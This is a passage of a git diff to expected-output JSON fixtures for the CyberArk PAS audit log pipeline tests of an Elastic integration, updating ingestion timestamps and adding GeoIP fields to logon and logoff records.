\u003cMessageID\u003e62\u003c/MessageID\u003e\\n \u003cDesc\u003eCreate File Version\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003ePSMPApp_SSH\u003c/Issuer\u003e\\n \u003cAction\u003eCreate File Version\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSMPLiveSessions\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\PSMPApp_SSH.LiveSessions\u003c/File\u003e\\n \u003cStation\u003e67.43.156.15\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eCreate File Version\u003c/Message\u003e\\n \u003cGatewayStation\u003e\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 05:57:27\",\"IsoTimestamp\":\"2021-03-14T12:57:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"62\",\"Desc\":\"Create File Version\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_SSH\",\"Action\":\"Create File Version\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSMPLiveSessions\",\"File\":\"Root\\\\PSMPApp_SSH.LiveSessions\",\"Station\":\"67.43.156.15\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Create File Version\",\"GatewayStation\":\"\"}}}", "code": "62", "kind": "event" diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json index 7bace2e2b98..939caf252d9 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-7-logon.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420964800Z", + "ingested": "2021-12-14T14:42:39.755852613Z", "original": "{\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eno\u003c/Rfc5424\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.6.0000\u003c/Version\u003e\\n \u003cMessageID\u003e7\u003c/MessageID\u003e\\n \u003cDesc\u003eLogon\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eadm2\u003c/Issuer\u003e\\n \u003cAction\u003eLogon\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003e\u003c/Safe\u003e\\n \u003cFile\u003e\u003c/File\u003e\\n \u003cStation\u003e10.2.0.6\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eLogon\u003c/Message\u003e\\n \u003cGatewayStation\u003e10.2.0.3\u003c/GatewayStation\u003e\\n \u003c/audit_record\u003e\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"no\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.6.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"adm2\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.2.0.6\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.2.0.3\",\"IsoTimestamp\":\"2021-03-16T15:01:00Z\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420973400Z", + "ingested": "2021-12-14T14:42:39.755855157Z", "original": "\u003c5\u003e1 2021-03-04T19:10:05Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:05\",\"IsoTimestamp\":\"2021-03-04T19:10:05Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420978900Z", + "ingested": "2021-12-14T14:42:39.755855769Z", "original": "\u003c5\u003e1 2021-03-04T19:10:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:10:20\",\"IsoTimestamp\":\"2021-03-04T19:10:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"SCIM-user\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420984300Z", + "ingested": "2021-12-14T14:42:39.755856475Z", "original": "\u003c5\u003e1 2021-03-04T19:11:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:20\",\"IsoTimestamp\":\"2021-03-04T19:11:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420989600Z", + "ingested": "2021-12-14T14:42:39.755856891Z", "original": "\u003c5\u003e1 2021-03-04T19:11:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 11:11:23\",\"IsoTimestamp\":\"2021-03-04T19:11:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.420995100Z", + "ingested": "2021-12-14T14:42:39.755857315Z", "original": "\u003c5\u003e1 2021-03-05T10:18:50Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 05 02:18:50\",\"IsoTimestamp\":\"2021-03-05T10:18:50Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -460,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421000500Z", + "ingested": "2021-12-14T14:42:39.755857771Z", "original": "\u003c5\u003e1 2021-03-08T18:07:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:07:51\",\"IsoTimestamp\":\"2021-03-08T18:07:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -489,6 +489,15 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -536,7 +545,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421003800Z", + "ingested": "2021-12-14T14:42:39.755858160Z", "original": "\u003c5\u003e1 2021-03-09T08:32:51Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 00:32:51\",\"IsoTimestamp\":\"2021-03-09T08:32:51Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -565,6 +574,15 @@ "ip": "10.0.1.20" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -612,7 +630,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421007900Z", + "ingested": "2021-12-14T14:42:39.755858549Z", "original": "\u003c5\u003e1 2021-03-09T10:14:58Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 09 02:14:58\",\"IsoTimestamp\":\"2021-03-09T10:14:58Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"10.0.1.20\"}}}", "code": "7", "kind": "event", @@ -637,6 +655,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -679,7 +706,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421012900Z", + "ingested": "2021-12-14T14:42:39.755858960Z", "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -704,6 +731,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -746,7 +782,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421017400Z", + "ingested": "2021-12-14T14:42:39.755859338Z", "original": "\u003c5\u003e1 2021-03-10T09:11:48Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:48\",\"IsoTimestamp\":\"2021-03-10T09:11:48Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPApp_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -771,6 +807,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -813,7 +858,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:10.421021100Z", + "ingested": "2021-12-14T14:42:39.755859945Z", "original": "\u003c5\u003e1 2021-03-10T09:11:49Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:49\",\"IsoTimestamp\":\"2021-03-10T09:11:49Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", diff --git a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json index edc4636d847..4c3b29055a7 100644 --- a/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json +++ b/packages/cyberarkpas/data_stream/audit/_dev/test/pipeline/test-8-logoff.log-expected.json @@ -49,7 +49,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641097400Z", + "ingested": "2021-12-14T14:42:41.147012483Z", "original": "\u003c5\u003e1 2021-03-08T18:19:15Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:19:15\",\"IsoTimestamp\":\"2021-03-08T18:19:15Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641105700Z", + "ingested": "2021-12-14T14:42:41.147014696Z", "original": "\u003c5\u003e1 2021-03-08T18:59:23Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 08 10:59:23\",\"IsoTimestamp\":\"2021-03-08T18:59:23Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"127.0.0.1\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -183,7 +183,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641111200Z", + "ingested": "2021-12-14T14:42:41.147015053Z", "original": "\u003c5\u003e1 2021-03-10T08:28:28Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:28\",\"IsoTimestamp\":\"2021-03-10T08:28:28Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -250,7 +250,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641116600Z", + "ingested": "2021-12-14T14:42:41.147015408Z", "original": "\u003c5\u003e1 2021-03-10T08:28:29Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:29\",\"IsoTimestamp\":\"2021-03-10T08:28:29Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Prov_COMPONENTS\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -317,7 +317,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641122300Z", + "ingested": "2021-12-14T14:42:41.147015776Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -384,7 +384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641127700Z", + "ingested": "2021-12-14T14:42:41.147016125Z", "original": "\u003c5\u003e1 2021-03-10T08:28:30Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 00:28:30\",\"IsoTimestamp\":\"2021-03-10T08:28:30Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -409,6 +409,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -451,7 +460,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641133Z", + "ingested": "2021-12-14T14:42:41.147016453Z", "original": "\u003c5\u003e1 2021-03-10T09:11:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:11:33\",\"IsoTimestamp\":\"2021-03-10T09:11:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -476,6 +485,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -518,7 +536,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641136800Z", + "ingested": "2021-12-14T14:42:41.147016782Z", "original": "\u003c5\u003e1 2021-03-10T09:12:20Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:20\",\"IsoTimestamp\":\"2021-03-10T09:12:20Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMP_ADB_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -543,6 +561,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": "67.43.156.13" }, @@ -585,7 +612,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641141200Z", + "ingested": "2021-12-14T14:42:41.147017120Z", "original": "\u003c5\u003e1 2021-03-10T09:12:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 01:12:27\",\"IsoTimestamp\":\"2021-03-10T09:12:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"PSMPGW_localhost.localdomain\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -610,6 +637,15 @@ } }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.14", "ip": "67.43.156.14" }, @@ -652,7 +688,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:37:11.641146500Z", + "ingested": "2021-12-14T14:42:41.147017446Z", "original": "\u003c5\u003e1 2021-03-10T22:17:27Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 10 14:17:27\",\"IsoTimestamp\":\"2021-03-10T22:17:27Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"8\",\"Desc\":\"Logoff\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Logoff\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"67.43.156.14\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logoff\",\"GatewayStation\":\"\"}}}", "code": "8", "kind": "event", @@ -677,6 +713,15 @@ } }, "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, "address": "67.43.156.13", "ip": 